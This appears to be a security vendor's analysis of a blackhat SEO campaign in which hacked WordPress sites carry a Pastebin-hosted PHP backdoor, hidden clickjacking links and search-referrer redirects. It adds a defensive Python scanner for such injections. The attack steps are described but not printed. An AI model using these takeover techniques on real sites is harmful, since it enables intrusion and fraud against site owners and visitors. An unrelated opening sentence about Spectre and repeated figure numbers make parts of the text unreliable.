Horn and Lipp were also credited with the discovery of Spectre, along with Paul Kocher in collaboration with (in alphabetical order) Daniel Genkin of the University of Pennsylvania and the University of Maryland, Mike Hamburg from Rambus, and Yuval Yarom from the University of Adelaide and Data61.
Anatomy of a Blackhat SEO spam campaign (with a twist)
Legitimate websites are hacked and recruited into a spam network
During a periodic analysis of Cato Cloud traffic in the Cato Research Lab, we noticed that our security analytics engine was triggered by a request to a code sharing service, Pastebin. The request originated from a preschool website in Singapore (Figure 1).
Pastebin is a popular service for code storing and sharing. A “paste” within a Pastebin account refers to a piece of code that can be dynamically fetched and placed within a specific context, for example, a web page. While the service is used for legitimate purposes, it can also be used to enable web-based, malicious activities.
Figure 1 - Website screenshot
Analyzing the source code of the website led to a script tag, which was the source of the suspicious request. After analyzing other parts of the code, we noticed a few hidden links, which referred to shoe sales websites, clearly with no relation to the preschool website (Figure 2).
Figure 2 - Suspicious code snippet
The links are placed in a hidden part of the page overlapping one of the headers, so anyone who clicks the header is unknowingly referred to one of those websites. This is a well-known technique called “clickjacking”, which is used for various malicious purposes, such as collecting forced likes on a Facebook page.
When we dug a bit more into the specific Pastebin account, we saw additional pastes that indicate the malicious intentions of this actor.
Figure 4 - More than 500K hits on this paste
The following figure shows one of the pastes containing a PHP backdoor (Figure 5). A backdoor is a piece of code that is planted in a site and gives an attacker the ability to control the web server of the hacked site. This simple, yet effective, backdoor executes PHP code that the attacker can send using HTTP POST requests.
Figure 5 - PHP backdoor paste
The spam network in action
We discovered thousands of infected pages, all hosted on legitimate websites, containing links to the same spam retail network of sites. Each spam page contains a script that redirects users to a retail website operated by the spammers. The redirection occurs only if the user was referred to the page from a major search engine: Google, Bing, Yahoo or AOL (Figures 6, 7). This is a common blackhat SEO method used to falsely increase a page’s ranking.
The script is hosted on several subdomains including “google.jj4.co” and “gogle.jj4.co,” and the script name also varies.
Figure 6 - The script injection
Figure 7 - Contents of injected script
At the time of publication we could not validate if purchased goods are actually delivered. Obviously, anyone who uses such techniques to acquire traffic is not a trustworthy merchant.
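A small page audit covering both signs described above, the script pulled from a paste service (Figure 1) and the outbound links hidden from visitors (Figure 2), as an added Python example that is not Cato’s code. It uses only the standard library; the constructed page, the paste id, the shop domain and the site host are placeholders.

```python
"""Scan a page for injected paste-hosted scripts and hidden outbound links.

Constructed example: SAMPLE_HTML imitates the infected site, with placeholder
paste id, shop domain and site host.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

PASTE_HOSTS = {"pastebin.com"}
# Inline styles that keep an element out of the visitor's view.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?![.\d])"
    r"|(?:left|top)\s*:\s*-\d{3,}px|text-indent\s*:\s*-\d+", re.I)
VOID = {"br", "img", "input", "meta", "link", "hr"}


class InjectionScanner(HTMLParser):
    def __init__(self, site_host: str):
        super().__init__()
        self.site_host = site_host
        self.stack = []      # (tag, hidden) for every open element
        self.findings = []   # (kind, detail)

    def _hidden(self) -> bool:
        return any(hidden for _, hidden in self.stack)

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        # An element is hidden if any ancestor is, or its own style hides it.
        hidden = (self._hidden() or "hidden" in attr
                  or bool(HIDDEN_STYLE.search(attr.get("style") or "")))
        if tag == "script" and attr.get("src"):
            host = urlparse(attr["src"]).hostname or ""
            if host in PASTE_HOSTS:
                self.findings.append(("paste_script", attr["src"]))
            elif host and host != self.site_host:
                self.findings.append(("external_script", host))
        if tag == "a" and attr.get("href"):
            host = urlparse(attr["href"]).hostname or ""
            if hidden and host and host != self.site_host:
                self.findings.append(("hidden_outbound_link", host))
        if tag not in VOID:
            self.stack.append((tag, hidden))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerates unclosed children.
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break


def scan_html(html: str, site_host: str) -> list:
    """Return [(kind, detail)] for every suspicious script or hidden link."""
    parser = InjectionScanner(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings


SITE_HOST = "preschool-placeholder.test"  # constructed
SAMPLE_HTML = """<html><head>
<script src="https://pastebin.com/raw/PASTE_ID_PLACEHOLDER"></script>
<script src="/js/site.js"></script>
</head><body>
<h1>Welcome to our preschool</h1>
<div style="position:absolute; left:-9999px; top:0">
  <a href="http://shoes-placeholder.test/cheap">cheap shoes</a>
  <a href="http://shoes-placeholder.test/more">more shoes</a>
</div>
<p>Follow us: <a href="https://www.facebook.com/preschool">Facebook</a></p>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_HTML, SITE_HOST):
        print(f"{kind:22} {detail}")
```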
How the initial site takeover occurs
A search for the C&C domain in the paste from Figure 3 led us to the script that was used to attack the sites. The script is designed to exploit cross-site scripting (XSS) vulnerabilities in WordPress in order to take over the site and plant the URL references to the products and shops we saw earlier.
First, the attack script appends a simple PHP backdoor to one of the installed WordPress plugins - the exact PHP code that appears in one of the attacker’s pastes. Later, the script reports the domain and path of the hacked plugin.
Figure 6 - Attack script showing C&C URL
Figure 7 - Attack script
Lastly, the script attempts to add a user with administrative privileges to WordPress (Figure 8).
Figure 8 - Attack script
The use of Pastebin in the context of the spam network is important here, because the attacker can quickly replace the command and control (C&C) server domain in the paste, and have it impact all infected sites. This is needed when C&C servers get blacklisted and there is a need to quickly change them. Obviously, it is hard for Pastebin to detect and stop these activities. While this may be nothing more than an eCommerce scam, the same method can be used to deliver malware through exploit kits that can put end users at a much higher risk. The volume of activity around the Paste indicates hundreds of thousands of users could be impacted.
To prevent your website from being taken over by such attacks, regularly patch your WordPress instances and WordPress plugins, and limit admin access to specific IP addresses, such as your corporate network’s external IP.